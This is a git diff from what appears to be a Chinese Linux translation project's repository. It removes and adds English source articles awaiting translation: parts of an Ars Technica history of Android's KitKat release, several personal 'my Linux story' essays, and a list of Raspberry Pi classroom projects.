-KitKat also featured a lot of polish to the core OS interfaces that couldn't be updated via the Play Store. The System UI, Dialer, Clock, and Settings all saw updates.
-
-![KitKat's transparent bars on the Google Now Launcher.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/1homescreenz.png)
-KitKat's transparent bars on the Google Now Launcher.
-Photo by Ron Amadeo
-
-KitKat not only got rid of the unpopular lines to the left and right sides of the lock screen—it completely disabled lock screen widgets by default! Google obviously felt multiple lock screens and multiple home screens were a little to complicated for new users, so lock screen widgets now needed to be enabled in the settings. The lopsided time here and in the clock app was switched to a symmetrical weight, which looked a lot nicer.
-
-In KitKat, apps had the ability to make the system and status bars transparent, which significantly changed the look of the OS. The bars now blended into the wallpaper and any other app that chose to enable transparent bars. The bars could also be completely hidden by any app via a new feature called “immersive" mode.
-
-KitKat was the final nail in the “Tron" coffin, removing almost all traces of blue from the operating system. The status bar icons were changed from a blue to a neutral white. The status and system bars on the home screen weren’t completely transparent; a dark gradient was added to the top and bottom of the screen so that the white icons would still be visible on a light background.
-
-![Tweaks to Google Now and the folders.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/nowfolders.png)
-Tweaks to Google Now and the folders.
-Photo by Ron Amadeo
-
-The home screen that shipped with KitKat on the Nexus 5 was actually exclusive to the Nexus 5 for a few months, but it could now be on any Nexus device. The new home screen was called the "Google Now Launcher," and it was actually [the Google Search app][5]. Yes, Google Search grew from a simple search box to an entire home screen, and in KitKat, it drew the wallpaper, icons, app drawer, widgets, home screen settings, Google Now, and, of course, the search box. Thanks to Search now running the entire home screen, any time the home screen was open and the screen was on, voice commands could be activated by saying “OK Google." This was pointed out to the user with introductory “Say 'OK Google' text in the search bar, which would fade away after a few uses.
-
-Google Now was more integrated, too. Besides the usual swipe up from the system bar, Google Now was also the leftmost home screen. The new version brought some design tweaks as well. The Google logo was moved into the search bar, and the whole top area was compacted. A few card designs were cleaned up, and a new set of buttons at the bottom led to reminders, customization options, and an overflow button with settings, feedback, and help. Since Google Now was part of the home screen, it got transparent system and status bars, too.
-
-Transparency and “brightening up" certain parts of the OS were design themes in KitKat. Black was removed in the status and system bars by switching to transparent, and the black background of the folders was switched to white.
-
-![A screenshot showing the new, cleaner app screen layout, and a composite image of the app lineup.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/apps.png)
-A screenshot showing the new, cleaner app screen layout, and a composite image of the app lineup.
-Photo by Ron Amadeo
-
-The KitKat icon lineup changed significantly from 4.3. To be more dramatic, it was a bloodbath, with Google removing seven icons over the 4.3 loadout. Google Hangouts could handle SMS now, so the Messaging app was removed. Hangouts also took over Google+ Messenger duties, so that app shortcut was cut. Google Currents was removed as a default app, as it would soon be killed—along with Google Play Magazines—in favor of Google Play Newsstand. Google Maps was beaten back into a single icon, which meant Local and Navigation shortcuts were removed. The impossible-to-understand Movie Studio was cut, too—Google must have realized no one wants to edit movies on a phone. Thanks to the home screen “OK Google" hotword detection, the Voice Search icon was rendered redundant and removed. Depressingly, the long abandoned News & Weather app remained.
-
-There was a new app called “Photos"—really the Google+ app—which took over picture management duties. On the Nexus 5, the Gallery and Google+ Photos were pretty similar, but in newer builds of KitKat present on Google Play Edition devices, the Gallery was completely replaced by Google+ photos. Play Games was an interface for Google’s back-end multiplayer service—a Googly version of Xbox Live or Apple’s Game Center. Google Drive, which existed for years as a Play Store app, was finally made a default app. Google bought Quickoffice back in June 2012, now finally deeming the app acceptable for inclusion by default. While Drive opened Google Documents, Quickoffice opened Microsoft Office Documents. If keeping track, that was two document editing apps and two photo editing apps included on most KitKat loadouts.
-
-----------
-
-![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
-
-[Ron Amadeo][a] / Ron is the Reviews Editor at Ars Technica, where he specializes in Android OS and Google products. He is always on the hunt for a new gadget and loves to rip things apart to see how they work.
-
-[@RonAmadeo][t]
-
---------------------------------------------------------------------------------
-
-via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/25/
-
-译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
-
-[1]:http://arstechnica.com/gadgets/2013/09/official-the-next-edition-of-android-is-kitkat-version-4-4/
-[2]:http://www.androidpolice.com/2014/02/10/rumor-google-to-begin-forcing-oems-to-certify-android-devices-with-a-recent-os-version-if-they-want-google-apps/
-[3]:http://www.androidpolice.com/2014/03/01/glass-xe14-delayed-until-its-ready-promises-big-changes-and-a-move-to-kitkat/
-[4]:http://arstechnica.com/gadgets/2014/03/in-depth-with-android-wear-googles-quantum-leap-of-a-smartwatch-os/
-[5]:http://arstechnica.com/gadgets/2013/11/google-just-pulled-a-facebook-home-kitkats-primary-interface-is-google-search/
-[a]:http://arstechnica.com/author/ronamadeo
-[t]:https://twitter.com/RonAmadeo
\ No newline at end of file
diff --git a/sources/talk/The history of Android/26 - The history of Android.md b/sources/talk/The history of Android/26 - The history of Android.md
deleted file mode 100644
index 3f9e1427ba..0000000000
--- a/sources/talk/The history of Android/26 - The history of Android.md
+++ /dev/null
@@ -1,87 +0,0 @@
-The history of Android
-================================================================================
-![The new "add to home screen" interface was definitely inspired by Honeycomb.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/homesetupthrowback.png)
-The new "add to home screen" interface was definitely inspired by Honeycomb.
-Photo by Ron Amadeo
-
-KitKat added a nice throwback to Honeycomb with the home screen configuration screen. On the massive 10-inch screen of a Honeycomb tablet (right picture, above), long pressing on the home screen background would present you with a zoomed-out view of all your home screens. Widgets could be dragged from the bottom widget drawer into any home screen—it was very handy. When it came time to bring the Honeycomb interface to phones, from Android 4.0 all the way to 4.3, Google skipped this design and left it to the larger screened devices, presenting only a list of options after a long press (center picture).
-
-For KitKat though, Google finally came up with a solution. After a long press, 4.4 presented a slightly zoomed out view—you could see the current home screen and the screens to the left and right of it. Tapping on the “widgets" button would open a full screen list of widget thumbnails, but after long-pressing on a widget, you were thrown back into the zoomed-out view and could scroll through home screen pages and place the icon where you wanted. By dragging an icon or widget all the way past the rightmost home page, you could create a new home page.
-
-![Contacts and the Keyboard both removed any trace of blue.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/RIP33B5E5.png)
-Contacts and the Keyboard both removed any trace of blue.
-Photo by Ron Amadeo
-
-KitKat was the end of the line for the Tron design. In most parts of the OS, any remaining blue highlights were removed in favor of gray. In the People app, blue was sucked out of the header and the letter separators in the contact list. The pictures swapped sides and the bottom bar was changed to a light gray to match the top. The Keyboard, which injected the color blue into nearly every app, was changed to gray-on-gray-on-gray. That wasn't a bad thing. Apps should be allowed to have their own color scheme—forcing a potentially clashing color on them via the keyboard wasn’t good design.
-
-![The first three screenshots show KitKat's dialer, and the last one is 4.3.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/phone.png)
-The first three screenshots show KitKat's dialer, and the last one is 4.3.
-Photo by Ron Amadeo
-
-Google completely revamped the dialer in KitKat, creating a wild new design that changed the way users thought about a phone. Actual numbers in the new dialer were hidden as much as possible—there wasn’t even a dial pad on the main screen. The primary interface for making a phone call was now a search bar! If you wanted to call someone in your contacts, just type their name in; if you wanted to call a business, just type the business name in and the dialer would search through Google Maps’ extensive database of phone numbers. It worked incredibly well and was something only Google could pull off.
-
-If searching for numbers wasn’t your thing, the app also intelligently displayed a listing for the previous phone call, your most-contacted people, and a link to all contacts. At the bottom were links to your call history, the now old school number pad, and the usual overflow button containing a settings page.
-
-![Office stuff: Google Drive, which was now packed in, and the printing support.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/googledrive-and-printing.png)
-Office stuff: Google Drive, which was now packed in, and the printing support.
-Photo by Ron Amadeo
-
-It was amazing it took this long, but in KitKat, Google Drive was finally included as a default app. Drive allowed users to create and edit Google Docs spreadsheets and documents, scan documents with the camera and upload them as PDFs, or view (but not edit) presentations. Drive, by this point, had a great, modern design with a slide-out navigation drawer and a Google Now-style card design.
-
-For even more mobile office fun, KitKat included an OS-level printing framework. At the bottom of the settings was a "Printing" screen, and any printer OEM could make a plugin for it. Google Cloud Print was, of course, one of the first supporters. Once your printer was hooked up to Cloud Print, either natively or through a computer with Chrome installed, you could print to it over the Internet. Apps needed to support the printing framework, too. Pressing the little "i" button on Google Drive would show information about the document and give you the option to print it. Just like a desktop OS, a print dialog would pop up with settings like copies, paper size, and page selection.
-
-![The "Photos" section of the Google+ app, which replaced the Gallery.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/that-is-one-dead-gallery.png)
-The "Photos" section of the Google+ app, which replaced the Gallery.
-Photo by Ron Amadeo
-
-Google+ Photos and the Gallery initially shipped together on the Nexus 5, but in a later build of KitKat on Google Play devices, the Gallery was axed and Google+ completely took over photo duties. The new app changed the photo app from a light theme to a dark theme, and Google+ Photos brought a modern navigation drawer design.
-
-Android had long included an instant upload feature, which would automatically backup all pictures on Google’s cloud storage, first on Picasa and later on Google+. The big benefit of G+ Photos over the Gallery was that it could finally manage those cloud-stored photos. Little cloud icons in the lower right of a photo indicated backup status, and it would fill from right to left to indicate an upload-in-progress. G+ photos brought its own photo editor along with support for a million of other Google+ photo features, like highlights, auto awesome, and, of course, sharing to Google+.
-
-![Tweaks to the Clock app, which added an alarms tab and changed the time input dialog.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/clocks.png)
-Tweaks to the Clock app, which added an alarms tab and changed the time input dialog.
-Photo by Ron Amadeo
-
-Google changed the excellent time picker that was introduced in 4.2 to this strange clock interface, which was both slower and less precise than the old interface. First you were presented with a one-handed clock which you used to choose the hour, then that clock went away and another one-handed clock allowed you to choose the minute. Having to spin the minute hand or tap a spot on the clock face made it very difficult to pick times in non-five-minute increments. Unlike the old time picker, which required you to pick a time period, this just defaulted to AM (again making it possible to accidentally be off by 12 hours).
-
-### Today—Android everywhere ###
-
-![](http://cdn.arstechnica.net/wp-content/uploads/2014/05/android-everywhere2.png)
-Photo by Google/Sony/Motorola/Ron Amadeo
-
-What started out as a curious BlackBerry clone from a search engine company became the most popular OS in the world from one of the biggest titans in the tech industry. Android has become Google's de-facto consumer operating system, and it powers phones, tablets, Google Glass, Google TV, and more. [Parts of it][1] are even used in the Chromecast. In the future, Google will be bringing Android to watches and wearables with [Android Wear][2], and the [Open Automotive Alliance][3] will be bringing Android to cars. Google will be making a renewed commitment to the living room soon, too, with [Android TV][4]. The OS is such a core pillar of Google, that events that are supposed to cover company-wide products, like Google I/O, end up becoming Android launch parties.
-
-![Top row: the Google Play content stores. Bottom row: the Google Play Apps.](http://cdn.arstechnica.net/wp-content/uploads/2014/03/2014-03-30-03.08.jpg)
-Top row: the Google Play content stores. Bottom row: the Google Play Apps.
-Photo by Ron Amadeo
-
-What was once the ugly duckling of the mobile industry has transformed so much it now [wins design awards][5] for its user interface. The design of things like Google Now have affected everything the company produces, with even the desktop sites like Search, Google+, YouTube, and Maps getting in on the card design unity. The design keeps evolving as well. Google's next plan is to [unify design][6] across not just Android, but all of its products. The goal is to take something like Gmail and make it feel the same, whether you're using it on Android, a desktop browser, or a watch.
-
-Google outsourced so many pieces of Android to the Play Store, that version releases are becoming less and less necessary. Google decided the best way to beat carrier and OEM update issues was to sidestep those roadblocks completely. From here on out, there isn't much left to include in an Android update other than core under-the-hood changes—but even many APIs have been pushed to Google Play Services. If you just look at version releases, it seems like Android development has slowed down from the peak 2.5-month release cycle. But the reality is Google can now continually push out improvements to the Play Store in a never-ending, somewhat subtler stream of updates.
-
-With 1.5 million activations per day, Android has no where to go but up. In the future, Android will be headed from phones and tablets to cars and watches, and the lower system requirements of KitKat will drive phones to even lower prices in the developing world. The bottom line? More and more people will get online. And for many of those people, Android will be not just their phone but their primary computing device. With Android leading the charge for Google in so many areas, the OS that started off as a tiny acquisition has become one of Google's most important products.
-
-----------
-
-![Ron Amadeo](http://cdn.arstechnica.net/wp-content//uploads/authors/ron-amadeo-sq.jpg)
-
-[Ron Amadeo][a] / Ron is the Reviews Editor at Ars Technica, where he specializes in Android OS and Google products. He is always on the hunt for a new gadget and loves to rip things apart to see how they work.
-
-[@RonAmadeo][t]
-
---------------------------------------------------------------------------------
-
-via: http://arstechnica.com/gadgets/2014/06/building-android-a-40000-word-history-of-googles-mobile-os/26/
-
-译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
-
-[1]:http://blog.gtvhacker.com/2013/chromecast-exploiting-the-newest-device-by-google/
-[2]:http://arstechnica.com/gadgets/2014/03/in-depth-with-android-wear-googles-quantum-leap-of-a-smartwatch-os/
-[3]:http://arstechnica.com/information-technology/2014/01/open-automotive-alliance-aims-to-bring-android-inside-the-car/
-[4]:http://arstechnica.com/gadgets/2014/04/documents-point-to-android-tv-googles-latest-bid-for-the-living-room/
-[5]:http://userexperienceawards.com/uxa2012/
-[6]:http://arstechnica.com/gadgets/2014/04/googles-next-design-challenge-unify-app-design-across-platforms/
-[a]:http://arstechnica.com/author/ronamadeo
-[t]:https://twitter.com/RonAmadeo
\ No newline at end of file
diff --git a/sources/talk/my-open-source-story/20160316 Growing a career alongside Linux.md b/sources/talk/my-open-source-story/20160316 Growing a career alongside Linux.md
new file mode 100644
index 0000000000..24799508c3
--- /dev/null
+++ b/sources/talk/my-open-source-story/20160316 Growing a career alongside Linux.md
@@ -0,0 +1,49 @@
+Growing a career alongside Linux
+==================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/OPENHERE_blue.png?itok=3eqp-7gT)
+
+My Linux story started in 1998 and continues today. Back then, I worked for The Gap managing thousands of desktops running [OS/2][1] (and a few years later, [Warp 3.0][2]). As an OS/2 guy, I was really happy then. The desktops hummed along and it was quite easy to support thousands of users with the tools the GAP had built. Changes were coming, though.
+
+In November of 1998, I received an invitation to join a brand new startup which would focus on Linux in the enterprise. This startup became quite famous as [Linuxcare][2].
+
+### My time at Linuxcare
+
+I had played with Linux a bit, but had never considered delivering it to enterprise customers. Mere months later (which is a turn of the corner in startup time and space), I was managing a line of business that let enterprises get their hardware, software, and even books certified on a few flavors of Linux that were popular back then.
+
+I supported customers like IBM, Dell, and HP in ensuring their hardware ran Linux successfully. You hear a lot now about preloading Linux on hardware today, but way back then I was invited to Dell to discuss getting a laptop certified to run Linux for an upcoming trade show. Very exciting times! We also supported IBM and HP on a number of certification efforts that spanned a few years.
+
+Linux was changing fast, much like it always has. It gained hardware support for more key devices like sound, network, graphics. At around that time, I shifted from RPM-based systems to [Debian][3] for my personal use.
+
+### Using Linux through the years
+
+Fast forward some years and I worked at a number of companies that did Linux as hardened appliances, Linux as custom software, and Linux in the data center. By the mid 2000s, I was busy doing consulting for that rather large software company in Redmond around some analysis and verification of Linux compared to their own solutions. My personal use had not changed though—I would still run Debian testing systems on anything I could.
+
+I really appreciated the flexibility of a distribution that floated and was forever updated. Debian is one of the most fun and well supported distributions and has the best community I've ever been a part of.
+
+When I look back at my own adoption of Linux, I remember with fondness the numerous Linux Expo trade shows in San Jose, San Francisco, Boston, and New York in the early and mid 2000's. At Linuxcare we always did fun and funky booths, and walking the show floor always resulted in getting re-acquainted with old friends. Rumors of work were always traded, and the entire thing underscored the fun of using Linux in real endeavors.
+
+The rise of virtualization and cloud has really made the use of Linux even more interesting. When I was with Linuxcare, we partnered with a small 30-person company in Palo Alto. We would drive to their offices and get things ready for a trade show that they would attend with us. Who would have ever known that little startup would become VMware?
+
+I have so many stories, and there were so many people I was so fortunate to meet and work with. Linux has evolved in so many ways and has become so important. And even with its increasing importance, Linux is still fun to use. I think its openness and the ability to modify it has contributed to a legion of new users, which always astounds me.
+
+### Today
+
+I've moved away from doing mainstream Linux things over the past five years. I manage large scale infrastructure projects that include a variety of OSs (both proprietary and open), but my heart has always been with Linux.
+
+The constant evolution and fun of using Linux has been a driving force for me for over the past 18 years. I started with the 2.0 Linux kernel and have watched it become what it is now. It's a remarkable thing. An organic thing. A cool thing.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/3/my-linux-story-michael-perry
+
+作者:[Michael Perry][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+[a]: https://opensource.com/users/mpmilestogo
+[1]: https://en.wikipedia.org/wiki/OS/2
+[2]: https://archive.org/details/IBMOS2Warp3Collection
+[3]: https://en.wikipedia.org/wiki/Linuxcare
+[4]: https://www.debian.org/
+[5]:
diff --git a/sources/talk/my-open-source-story/20160330 After a nasty computer virus sys admin looks to Linux.md b/sources/talk/my-open-source-story/20160330 After a nasty computer virus sys admin looks to Linux.md
new file mode 100644
index 0000000000..3fb63afa4f
--- /dev/null
+++ b/sources/talk/my-open-source-story/20160330 After a nasty computer virus sys admin looks to Linux.md
@@ -0,0 +1,54 @@
+After a nasty computer virus, sys admin looks to Linux
+=======================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/OPENHERE_blue.png?itok=3eqp-7gT)
+
+My first brush with open source came while I was working for my university as a part-time system administrator in 2001. I was part of a small group that created business case studies for teaching not just in the university, but elsewhere in academia.
+
+As the team grew, the need for a robust LAN setup with file serving, intranet applications, domain logons, etc. emerged. Our IT infrastructure consisted mostly of bootstrapped Windows 98 computers that had become too old for the university's IT labs and were reassigned to our department.
+
+### Discovering Linux
+
+One day, as part of the university's IT procurement plan, our department received an IBM server. We planned to use it as an Internet gateway, domain controller, file and backup server, and intranet application host.
+
+Upon unboxing, we noticed that it came with Red Hat Linux CDs. No one on our 22-person team (including me) knew anything about Linux. After a few days of research, I met a friend of a friend who did Linux RTOS programming for a living. I asked him for some help installing it.
+
+It was heady stuff as I watched the friend load up the CD drive with the first of the installation CDs and boot into the Anaconda install system. In about an hour we had completed the basic installation, but still had no working internet connection.
+
+Another hour of tinkering got us connected to the Internet, but we still weren't anywhere near domain logons or Internet gateway functionality. After another weekend of tinkering, we were able to instruct our Windows 98 terminals to accept the IP of the the Linux PC as the proxy so that we had a working shared Internet connection. But domain logons were still some time away.
+
+We downloaded [Samba][1] over our awfully slow phone modem connection and hand configured it to serve as the domain controller. File services were also enabled via NFS Kernel Server and creating user directories and making the necessary adjustments and configurations on Windows 98 in Network Neighborhood.
+
+This setup ran flawlessly for quite some time, and we eventually decided to get started with Intranet applications for timesheet management and some other things. By this time, I was leaving the organization and had handed over most of the sys admin stuff to someone who replaced me.
+
+### A second Linux experience
+
+In 2004, I got into Linux once again. My wife ran an independent staff placement business that used data from services like Monster.com to connect clients with job seekers.
+
+Being the more computer literate of the two of us, it was my job to set things right with the computer or Internet when things went wrong. We also needed to experiment with a lot of tools for sifting through the mountains of resumes and CVs she had to go through on a daily basis.
+
+Windows [BSoDs][2] were a routine affair, but that was tolerable as long as the data we paid for was safe. I had to spend a few hours each week creating backups.
+
+One day, we had a virus that simply would not go away. Little did we know what was happening to the data on the slave disk. When it finally failed, we plugged in the week-old slave backup and it failed a week later. Our second backup simply refused to boot up. It was time for professional help, so we took our PC to a reputable repair shop. After two days, we learned that some malware or virus had wiped certain file types, including our paid data, clean.
+
+This was a body blow to my wife's business plans and meant lost contracts and delayed invoice payments. I had in the interim travelled abroad on business and purchased my first laptop computer from [Computex 2004][3] in Taiwan. It had Windows XP pre-installed, but I wanted to replace it with Linux. I had read that Linux was ready for the desktop and that [Mandrake Linux][4] was a good choice. My first attempt at installation went without a glitch. Everything worked beautifully. I used [OpenOffice][5] for my writing, presentation, and spreadsheet needs.
+
+We got new hard drives for our computer and installed Mandrake Linux on them. OpenOffice replaced Microsoft Office. We relied on webmail for mailing needs, and [Mozilla Firefox][6] was a welcome change in November 2004. My wife saw the benefits immediately, as there were no crashes or virus/malware infections. More importantly, we bade goodbye to the frequent crashes that plagued Windows 98 and XP. She continued to use the same distribution.
+
+I, on the other hand, started playing around with other distributions. I love distro-hopping and trying out new ones every once in a while. I also regularly try and test out web applications like Drupal, Joomla, and WordPress on Apache and NGINX stacks. And now our son, who was born in 2006, grew up on Linux. He's very happy with Tux Paint, Gcompris, and SMPlayer.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/3/my-linux-story-soumya-sarkar
+
+作者:[Soumya Sarkar][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+[a]: https://opensource.com/users/ssarkarhyd
+[1]: https://www.samba.org/
+[2]: https://en.wikipedia.org/wiki/Blue_Screen_of_Death
+[3]: https://en.wikipedia.org/wiki/Computex_Taipei
+[4]: https://en.wikipedia.org/wiki/Mandriva_Linux
+[5]: http://www.openoffice.org/
+[6]: https://www.mozilla.org/en-US/firefox/new/
diff --git a/sources/talk/my-open-source-story/20160510 Aspiring sys admin works his way up in Linux.md b/sources/talk/my-open-source-story/20160510 Aspiring sys admin works his way up in Linux.md
new file mode 100644
index 0000000000..7a2cc8d071
--- /dev/null
+++ b/sources/talk/my-open-source-story/20160510 Aspiring sys admin works his way up in Linux.md
@@ -0,0 +1,38 @@
+Aspiring sys admin works his way up in Linux
+===============================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BIZ_workplay.png?itok=uQqFssrf)
+
+I first saw Linux in action around 2001 at my first job. I was as an account manager for an Austrian automotive industry supplier and shared an office with our IT guy. He was creating a CD burning station (one of those huge things that can burn and print several CDs simultaneously) so that we could create and send CDs of our car parts catalogue to customers. While the burning station was originally designed for Windows, he just could not get it to work. He eventually gave up on Windows and turned to Linux, and it worked flawlessly.
+
+For me, it was all kind of arcane. Most of the work was done on the command line, which looked like DOS but was much more powerful (even back then, I recognized this). I had been a Mac user since 1993, and a CLI (command line interface) seemed a bit old fashioned to me at the time.
+
+It was not until years later—I believe around 2009—that I really discovered Linux for myself. By then, I had moved to the Netherlands and found a job working for a retail supplier. It was a small company (about 20 people) where, aside from my normal job as a key account manager, I had involuntarily become the first line of IT support. Whenever something didn't work, people first came to me before calling the expensive external IT consultant.
+
+One of my colleagues had fallen for a phishing attack and clicked on an .exe file in an email that appeared to be from DHL. (Yes, it does happen.) His computer got completely taken over and he could not do anything. Even a complete reformat wouldn't help, as the virus kept rearing it's ugly head. I only later learned that it probably had written itself to the MBR (Master Boot Record). By this time, the contract with the external IT consultant had been terminated due to cost savings.
+
+I turned to Ubuntu to get my colleague to work again. And work it did—like a charm. The computer was humming along again, and I got all the important applications to work like they should. In some ways it wasn't the most elegant solution, I'll admit, yet he (and I) liked the speed and stability of the system.
+
+However, my colleague was so entrenched in the Windows world that he just couldn't get used to the fact that some things were done differently. He just kept complaining. (Sound familiar?)
+
+While my colleague couldn't bear that things were done differently, I noticed that this was much less of an issue for me as a Mac user. There were more similarities. I was intrigued. So, I installed a dual boot with Ubuntu on my work laptop and found that I got much more work done in less time and it was much easier to get the machine to do what I wanted. Ever since then I've been regularly using several Linux distros, with Ubuntu and Elementary being my personal favorites.
+
+At the moment, I am unemployed and hence have a lot of time to educate myself. Because I've always had an interest in IT, I am working to get into Linux systems administration. But is awfully hard to get a chance to show your knowledge nowadays because 95% of what I have learned over the years can't be shown on a paper with a stamp on it. Interviews are the place for me to have a conversation about what I know. So, I signed up for Linux certifications that I hope give me the boost I need.
+
+I have also been contributing to open source for some time. I started by doing translations (English to German) for the xTuple ERP and have since moved on to doing Mozilla "customer service" on Twitter, filing bug reports, etc. I evangelize for free and open software (with varying degrees of success) and financially support several FOSS advocate organizations (DuckDuckGo, bof.nl, EFF, GIMP, LibreCAD, Wikipedia, and many others) whenever I can. I am also currently working to set up a regional privacy cafe.
+
+Aside from that, I have started working on my first book. It's supposed to be a lighthearted field manual for normal people about computer privacy and security, which I hope to self-publish by the end of the year. (The book will be licensed under Creative Commons.) As for content, you can expect that I will explain in detail why privacy is important and what is wrong with the whole "I have nothing to hide" mentality. But the biggest part will be instructions how to get rid of pesky ad-trackers, encrypting your hard disk and mail, chat OTR, how to use TOR, etc. While it's a manual first, I aim for a tone that is casual and easy to understand spiced up with stories of personal experiences.
+
+I still love my Macs and will use them whenever I can afford it (mainly because of the great construction), but Linux is always there in a VM and is used for most of my daily work. Nothing fancy here, though: word processing (LibreOffice and Scribus), working on my website and blog (Wordpress and Jekyll), editing some pictures (Shotwell and Gimp), listening to music (Rhythmbox), and pretty much every other task that comes along.
+
+Whichever way my job hunt turns out, I know that Linux will always be my go-to system.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/5/my-linux-story-rene-raggl
+
+作者:[Rene Raggl][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+[a]: https://opensource.com/users/rraggl
diff --git a/sources/talk/yearbook2015/20151208 10 tools for visual effects in Linux with Kdenlive.md b/sources/talk/yearbook2015/20151208 10 tools for visual effects in Linux with Kdenlive.md
index bf2ba1ff25..c017d22de2 100644
--- a/sources/talk/yearbook2015/20151208 10 tools for visual effects in Linux with Kdenlive.md
+++ b/sources/talk/yearbook2015/20151208 10 tools for visual effects in Linux with Kdenlive.md
@@ -152,4 +152,4 @@ via: https://opensource.com/life/15/12/10-kdenlive-tools
[3]:http://frei0r.dyne.org/
[4]:http://www.kodak.com/global/en/professional/products/films/bw/triX2.jhtml
[5]:https://en.wikipedia.org/wiki/Fear_and_Loathing_in_Las_Vegas_(film)
-[6]:https://en.wikipedia.org/wiki/Dead_Island
\ No newline at end of file
+[6]:https://en.wikipedia.org/wiki/Dead_Island
diff --git a/sources/talk/yearbook2015/20151208 5 great Raspberry Pi projects for the classroom.md b/sources/talk/yearbook2015/20151208 5 great Raspberry Pi projects for the classroom.md
deleted file mode 100644
index 302034c330..0000000000
--- a/sources/talk/yearbook2015/20151208 5 great Raspberry Pi projects for the classroom.md
+++ /dev/null
@@ -1,100 +0,0 @@
-taichirain 翻译中
-
-5 great Raspberry Pi projects for the classroom
-5 伟大的树莓派项目教室
-================================================================================
-![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/osdc-open-source-yearbook-lead3.png)
-
-Image by : opensource.com
-图片来源 : opensource.com
-
-### 1. Minecraft Pi ###
-
-Courtesy of the Raspberry Pi Foundation. [CC BY-SA 4.0.][1]
-
-Minecraft is the favorite game of pretty much every teenager in the world—and it's one of the most creative games ever to capture the attention of young people. The version that comes with every Raspberry Pi is not only a creative thinking building game, but comes with a programming interface allowing for additional interaction with the Minecraft world through Python code.
-
-Minecraft: Pi Edition is a great way for teachers to engage students with problem solving and writing code to perform tasks. You can use the Python API to build a house and have it follow you wherever you go, build a bridge wherever you walk, make it rain lava, show the temperature in the sky, and anything else your imagination can create.
-
-Read more in "[Getting Started with Minecraft Pi][2]."
-
-### 2. Reaction game and traffic lights ###
-
-![](https://opensource.com/sites/default/files/pi_traffic_installed_yellow_led_on.jpg)
-
-Courtesy of [Low Voltage Labs][3]. [CC BY-SA 4.0][1].
-
-It's really easy to get started with physical computing on Raspberry Pi—just connect up LEDs and buttons to the GPIO pins, and with a few lines of code you can turn lights on and control things with button presses. Once you know the code to do the basics, it's down to your imagination as to what you do next!
-
-If you know how to flash one light, you can flash three. Pick out three LEDs in traffic light colors and you can code the traffic light sequence. If you know how to use a button to a trigger an event, then you have a pedestrian crossing! Also look out for great pre-built traffic light add-ons like [PI-TRAFFIC][4], [PI-STOP][5], [Traffic HAT][6], and more.
-
-It's not always about the code—this can be used as an exercise in understanding how real world systems are devised. Computational thinking is a useful skill in any walk of life.
-
-![](https://opensource.com/sites/default/files/reaction-game.png)
-
-Courtesy of the Raspberry Pi Foundation. [CC BY-SA 4.0][1].
-
-Next, try wiring up two buttons and an LED and making a two-player reaction game—let the light come on after a random amount of time and see who can press the button first!
-
-To learn more, check out "[GPIO Zero recipes][7]. Everything you need is in [CamJam EduKit 1][8].
-
-### 3. Sense HAT Pixel Pet ###
-
-The Astro Pi—an augmented Raspberry Pi—is going to space this December, but you haven't missed your chance to get your hands on the hardware. The Sense HAT is the sensor board add-on used in the Astro Pi mission and it's available for anyone to buy. You can use it for data collection, science experiments, games and more. Watch this Gurl Geek Diaries video from Raspberry Pi's Carrie Anne for a great way to get started—by bringing to life an animated pixel pet of your own design on the Sense HAT display:
-
-注:youtube 视频
-
-
-Learn more in "[Exploring the Sense HAT][9]."
-
-### 4. Infrared bird box ###
-
-![](https://opensource.com/sites/default/files/ir-bird-box.png)
-Courtesy of the Raspberry Pi Foundation. [CC BY-SA 4.0.][1]
-
-A great exercise for the whole class to get involved with—place a Raspberry Pi and the NoIR camera module inside a bird box along with some infra-red lights so you can see in the dark, then stream video from the Pi over the network or on the internet. Wait for birds to nest and you can observe them without disturbing them in their habitat.
-
-Learn all about infrared and the light spectrum, and how to adjust the camera focus and control the camera in software.
-
-Learn more in "[Make an infrared bird box.][10]"
-
-### 5. Robotics ###
-
-![](https://opensource.com/sites/default/files/edukit3_1500-alex-eames-sm.jpg)
-
-Courtesy of Low Voltage Labs. [CC BY-SA 4.0][1].
-
-With a Raspberry Pi and as little as a couple of motors and a motor controller board, you can build your own robot. There is a vast range of robots you can make, from basic buggies held together by sellotape and a homemade chassis, all the way to self-aware, sensor-laden metallic stallions with camera attachments driven by games controllers.
-
-Learn how to control individual motors with something straightforward like the RTK Motor Controller Board (£8/$12), or dive into the new CamJam robotics kit (£17/$25) which comes with motors, wheels and a couple of sensors—great value and plenty of learning potential.
-
-Alternatively, if you'd like something more hardcore, try PiBorg's [4Borg][11] (£99/$150) or [DiddyBorg][12] (£180/$273) or go the whole hog and treat yourself to their DoodleBorg Metal edition (£250/$380)—and build a mini version of their infamous [DoodleBorg tank][13] (unfortunately not for sale).
-
-Check out the [CamJam robotics kit worksheets][14].
-
-
---------------------------------------------------------------------------------
-
